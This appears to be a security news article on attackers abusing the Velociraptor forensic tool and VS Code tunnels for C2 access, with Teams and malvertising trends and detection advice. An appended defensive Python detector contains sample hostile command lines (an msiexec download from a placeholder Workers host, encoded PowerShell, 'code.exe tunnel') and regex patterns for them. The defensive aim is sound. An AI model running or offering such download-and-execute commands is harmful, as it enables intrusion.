Attackers turn Velociraptor into a C2 taxi
• What happened: Researchers spotted attackers installing the open-source forensic tool Velociraptor and then using it to fetch and run Visual Studio Code in “tunnel” mode—turning a developer editor into a handy route back to an attacker-controlled C2 server.
• How they got in: Windows msiexec pulled an MSI from a Cloudflare Workers domain to install Velociraptor, which then contacted another Workers domain. From there an encoded PowerShell command downloaded VS Code, launched with tunnelling enabled, and further payloads (including Cloudflare Tunnel and Radmin) were retrieved the same way.
• Why it matters: Using incident-response tools as part of the attack chain is an evolution of “living off the land”. Sophos advises watching for unauthorised Velociraptor use as a likely pre-ransomware signal and tightening EDR, monitoring and backup practices.
• Wider trend: Separate research highlights Microsoft Teams being abused for initial access (IT-helpdesk impersonation, remote-access tools, PowerShell payloads) and a malvertising twist that leverages office.com redirects via ADFS to deliver convincing Microsoft 365 phishing pages.
• Vendor response: Rapid7, which maintains Velociraptor, acknowledged the misuse and published detection tips: check the Velociraptor Application event log (Event ID 1000 with command-line args), look for changes to the Velociraptor EventLog registry key, and flag execution of unsigned Velociraptor binaries.
Threat actors are getting creative. Instead of dropping obvious malware, they’re installing Velociraptor—a perfectly legitimate incident-response tool—and using it to download Visual Studio Code and flip on its tunnelling feature. Yes, your code editor just became a backdoor. How very 2025.
How the caper works
1. msiexec grabs an installer from a Cloudflare Workers domain.
2. That MSI puts Velociraptor on the box and phones home to another Workers address.
3. Velociraptor is then used to fetch VS Code, which is started with tunnelling enabled, giving the attacker remote access and code execution.
4. Extra goodies (like Cloudflare Tunnel and Radmin) can be pulled in the same way. Cheeky.
Why you should care
This is “living off the land” with a twist: abusing defenders’ tools to avoid suspicion. According to researchers, unapproved Velociraptor activity can be a pre-ransomware tell. Keep calm, but don’t ignore it.
The wider pattern
• Microsoft Teams lures are booming—attackers pose as IT support, get you to install remote-access tools, then drop PowerShell payloads.
• Malvertising is also having a moment: sponsored links redirect via ADFS to convincing Microsoft 365 phishing pages—harder to spot, easier to click. Mind the link.
What to do (right now)
• Hunt for Velociraptor misuse:
○ Check the Application log for Velociraptor Event ID 1000 and review the command-line arguments.
○ Monitor for changes to the Velociraptor EventLog registry key.
○ Be suspicious of unsigned Velociraptor binaries.
• Harden endpoints: EDR tuned for unexpected tools and odd parent/child processes; watch for msiexec + Workers domains + encoded PowerShell.
• Prepare for phishing on new fronts: train users to challenge Teams “IT support” DMs and review ad-blocking/allow-listing to counter malvertising.
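As an added illustration of the hunt above (example code written for this page, not part of the original article and not Sophos or Rapid7 tooling): a small Python detector that tags process-creation records for the stages of the chain and only calls it a chain when several co-occur. The sample records, the `*.workers.dev` suffix assumed for Cloudflare Workers hosting, the `code.exe tunnel` invocation form, the regexes and the tag names are all this example's own assumptions; the Event ID 1000 and registry-key checks still have to be done on the live host.

```python
import re

# Constructed sample process-creation records (not real telemetry); one per line: parent_image|image|command_line
SAMPLE_EVENTS = r"""
explorer.exe|msiexec.exe|msiexec.exe /i https://example-worker.demo.workers.dev/setup.msi /qn
msiexec.exe|velociraptor.exe|velociraptor.exe --config client.config.yaml service install
velociraptor.exe|powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
powershell.exe|code.exe|code.exe tunnel
explorer.exe|msiexec.exe|msiexec.exe /i C:\Users\dev\Downloads\7zip.msi /qn
explorer.exe|powershell.exe|powershell.exe -File C:\scripts\backup.ps1
"""

# Stage indicators described in the write-up (the regexes themselves are this example's own).
WORKERS_MSI = re.compile(r"https?://\S+\.workers\.dev/\S*\.msi", re.I)   # assumes *.workers.dev hosting
ENCODED_PS = re.compile(r"\s-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
VSCODE_TUNNEL = re.compile(r"\bcode(\.exe)?\s+tunnel\b", re.I)
CHAIN_STAGES = ("msiexec_workers_msi", "velociraptor_exec", "encoded_powershell", "vscode_tunnel")

def parse_events(text):
    """Split the pipe-separated records into dicts; image names are lower-cased."""
    events = []
    for line in text.splitlines():
        if line.strip():
            parent, image, cmd = line.split("|", 2)
            events.append({"parent": parent.lower(), "image": image.lower(), "cmd": cmd})
    return events

def tag_event(ev):
    """Return the chain-stage tags a single record matches."""
    tags = []
    if ev["image"] == "msiexec.exe" and WORKERS_MSI.search(ev["cmd"]):
        tags.append("msiexec_workers_msi")
    if ev["image"].startswith("velociraptor"):
        tags.append("velociraptor_exec")  # confirm against approved deployments and binary signature
    if ev["image"].startswith("powershell") and ENCODED_PS.search(ev["cmd"]):
        tags.append("encoded_powershell")
        if ev["parent"].startswith("velociraptor"):
            tags.append("velociraptor_spawned_powershell")  # the odd parent/child pair
    if ev["image"].startswith("code") and VSCODE_TUNNEL.search(ev["cmd"]):
        tags.append("vscode_tunnel")
    return tags

def assess(text):
    """Tag every record and decide whether enough stages co-occur to call it a chain."""
    tags = set()
    for ev in parse_events(text):
        tags.update(tag_event(ev))
    hits = [s for s in CHAIN_STAGES if s in tags]
    verdict = "likely_velociraptor_c2_chain" if len(hits) >= 3 else ("review" if hits else "clean")
    return sorted(tags), verdict
```

Running `assess(SAMPLE_EVENTS)` flags all four stages plus the Velociraptor-to-PowerShell parent/child pair, while the local 7-Zip install and the scripted backup produce no tags.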